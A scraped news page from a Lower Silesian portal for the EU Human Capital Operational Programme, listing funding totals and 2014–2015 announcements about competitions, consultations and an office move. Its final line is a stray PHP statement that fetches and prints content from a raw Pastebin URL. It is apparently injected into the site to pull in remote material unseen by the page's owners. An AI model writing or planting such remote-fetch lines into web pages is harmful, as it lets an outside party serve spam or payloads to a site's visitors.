Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

01.04.2015 III EDYCJA KONKURSU „REGATY ROZWOJU: LIDERZY INNOWACJI I WSPÓŁPRACY PONADNARODOWEJ PO KL 2007-2013”

Patronat honorowy „Minister Infrastruktury i Rozwoju – Pani Maria Wasiak” Krajowa Instytucja Wspomagająca - Centrum Projektów Europejskich ma przyjemność zaprosić Państwa do wzięcia udziału w III edycji Konkursu przeznaczonego...więcej ››

24.03.2015 Konkursy DWUP

Szanowni Państwo, Dolnośląski Wojewódzki Urząd Pracy ma przyjemność zaprosić do udziału w następujących konkursach: 1. Konkurs fotograficzny „Praca z Unią Europejską w tle” - więcej 2. Konkurs na krótką opowieść pt. „Jak EFS...więcej ››

10.03.2015 Konsultacje społeczne projektu Szczegółowego Opisu Osi Priorytetowych RPO WD 2014-2020

Uprzejmie informujemy, że rozpoczęły się konsultacje społeczne projektu Szczegółowego Opisu Osi Priorytetowych RPO WD 2014-2020. Wszelkie szczegółowe informacje na temat konsultacji społecznych ww. dokumentu są dostępne na...więcej ››

15.01.2015 Zmiana lokalizacji Departamentu Funduszy Europejskich

Szanowni Państwo, Uprzejmie informujemy, że od listopada 2014 sekretariat Departamentu Funduszy Europejskich będzie mieści się w pokoju 523 w budynku Fortum przy ul. Walońskiej 3 (po drugiej stronie parkingu przed budynkiem...więcej ››

14.01.2015 Publikowanie ofert szkoleniowych na portalu inwestycjawkadry.pl

Szanowni PaństwoMając na uwadze prowadzone prace modernizacyjne w zakresie bazy ofert szkoleniowych, która pod nazwą Rejestr Usług Rozwojowych dostępna będzie dla beneficjentów projektów współfinansowanych z Europejskiego...więcej ››

22.12.2014 Życzenia Świąteczne

15.12.2014 Odstępstwo od Planu działania dla Priorytetu IX – Działanie 9.2

Szanowni Państwo, Instytucja Pośrednicząca informuje o odstępstwie od Planu działania  dla Priorytetu IX w ramach Działania 9.2 PO KL. Odstępstwo polega na aktualizacji fiszki projektu systemowego pn. „Modernizacja...więcej ››

28.11.2014 Zaproszenie na spotkanie dotyczące procesu akredytacji OWES w kontekście założeń Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020

Serdecznie zapraszamy na spotkanie dotyczące Systemu Akredytacji i Standardów Działania Instytucji Wsparcia Ekonomii Społecznej – AKSES w kontekście założeń Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020....więcej ››

Wyświetla nowości od 17 do 24 ze wszystkich 337
echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");